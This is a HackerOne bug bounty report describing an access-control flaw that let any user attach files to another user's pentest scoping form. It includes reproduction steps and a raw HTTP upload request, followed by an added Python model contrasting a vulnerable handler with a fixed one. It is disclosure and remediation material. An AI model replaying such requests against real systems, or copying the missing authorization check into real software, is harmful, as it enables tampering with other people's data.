hackerone / Hillybot__ / H1:2450215

HackerOne: Any user could upload attachments to pentest scoping form they don't have access to

2024-04-06 06:41:55
hillybot__
hackerone.com
hackerone
pentest scoping form
attachment upload
business logic error
malicious files
bugbounty

AI Score: 7.1 High (Confidence: Low)

Hello team,
In my recent testing I found that any user could upload attachments to any other user's pentest scoping form without having access to it, as long as they have the scope id.
Note: before you start, you will require two accounts to test for this bug.
Steps to reproduce:

  1. Create a sandbox.
  2. Go to Pentests and start a pentest scoping form.
  3. Copy the pentest form id from the URL.
  4. Log in to your second account.
  5. Send the following request, using the form id copied in step 3 as the tracer value:
    ==================================================================================================================
    POST /attachments HTTP/2
    Host: hackerone.com
    Cookie: your cookies
    Content-Type: multipart/form-data; boundary=---------------------------22121373215470710503552942440

    -----------------------------22121373215470710503552942440
    Content-Disposition: form-data; name="tracer"

    989953fa-5635-43c9-b584-48736d224b15
    -----------------------------22121373215470710503552942440
    Content-Disposition: form-data; name="context_type"

    PentestOpportunity
    -----------------------------22121373215470710503552942440
    Content-Disposition: form-data; name="file"; filename="does not have a option to change his own permission.png"
    Content-Type: image/png

    (file contents)
    -----------------------------22121373215470710503552942440--
    ====================================================================================================================
  6. From your first account, reload the scoping form and go to "Review and submit".
  7. You will notice that the file has been uploaded successfully.
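The flaw in the steps above is an authorization gap: the upload endpoint resolves the target context from a client-supplied id (context_type plus tracer) and never asks whether the caller may write to that context. The following in-memory model is an added illustration, not HackerOne's code; the class and method names (AttachmentService, PentestOpportunity, upload_vulnerable, upload_fixed) and the "victim"/"attacker" accounts are assumptions for the example. It places the vulnerable handler beside a hardened one that checks ownership of the scoping form before attaching anything.

```python
"""Constructed example: attachment upload with and without an access check.

Models the report's request: the client sends context_type, a tracer id and a
file; the server attaches the file to the referenced context.  Names are
hypothetical and do not reflect HackerOne's implementation.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple
import uuid


class Forbidden(Exception):
    """Raised when the caller may not attach files to the target context."""


@dataclass
class Attachment:
    filename: str
    uploaded_by: str


@dataclass
class PentestOpportunity:
    # The "tracer" value from the request: knowing it must not imply owning it.
    tracer: str
    owner_id: str
    attachments: List[Attachment] = field(default_factory=list)


class AttachmentService:
    def __init__(self) -> None:
        self._contexts: Dict[str, PentestOpportunity] = {}

    def create_scoping_form(self, owner_id: str) -> PentestOpportunity:
        form = PentestOpportunity(tracer=str(uuid.uuid4()), owner_id=owner_id)
        self._contexts[form.tracer] = form
        return form

    def _lookup(self, context_type: str, tracer: str) -> PentestOpportunity:
        if context_type != "PentestOpportunity" or tracer not in self._contexts:
            raise KeyError("unknown context")
        return self._contexts[tracer]

    def upload_vulnerable(self, actor_id: str, context_type: str,
                          tracer: str, filename: str) -> PentestOpportunity:
        """Business logic error: existence of the context is the only check."""
        ctx = self._lookup(context_type, tracer)
        ctx.attachments.append(Attachment(filename, actor_id))
        return ctx

    def upload_fixed(self, actor_id: str, context_type: str,
                     tracer: str, filename: str) -> PentestOpportunity:
        """Authorize the caller against the context before attaching anything."""
        ctx = self._lookup(context_type, tracer)
        if ctx.owner_id != actor_id:
            raise Forbidden("caller has no access to this scoping form")
        ctx.attachments.append(Attachment(filename, actor_id))
        return ctx


def demo() -> Tuple[List[str], bool, List[str]]:
    """Two accounts, one scoping form: who each handler lets attach a file.

    Returns (uploaders after the vulnerable call, whether the fixed handler
    rejected the attacker, filenames on the form at the end).
    """
    svc = AttachmentService()
    victim_form = svc.create_scoping_form(owner_id="victim")

    # Attacker knows the tracer (step 3 of the report) but does not own the form.
    svc.upload_vulnerable("attacker", "PentestOpportunity",
                          victim_form.tracer, "payload.png")
    leaked = [a.uploaded_by for a in victim_form.attachments]

    try:
        svc.upload_fixed("attacker", "PentestOpportunity",
                         victim_form.tracer, "payload.png")
        blocked = False
    except Forbidden:
        blocked = True

    # The legitimate owner is still able to attach files after the fix.
    svc.upload_fixed("victim", "PentestOpportunity",
                     victim_form.tracer, "scope.pdf")
    return leaked, blocked, [a.filename for a in victim_form.attachments]


if __name__ == "__main__":
    print(demo())
```

The check belongs on the server side of the attachment endpoint, keyed on the resolved context rather than on anything the client sends; in a real application the ownership test would consult the team membership or role model for the scoping form, and a failed check should be indistinguishable from a missing context so the endpoint does not confirm which tracer ids exist.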

Impact

Business logic error: an attacker could attach malicious files to anyone's scoping form.
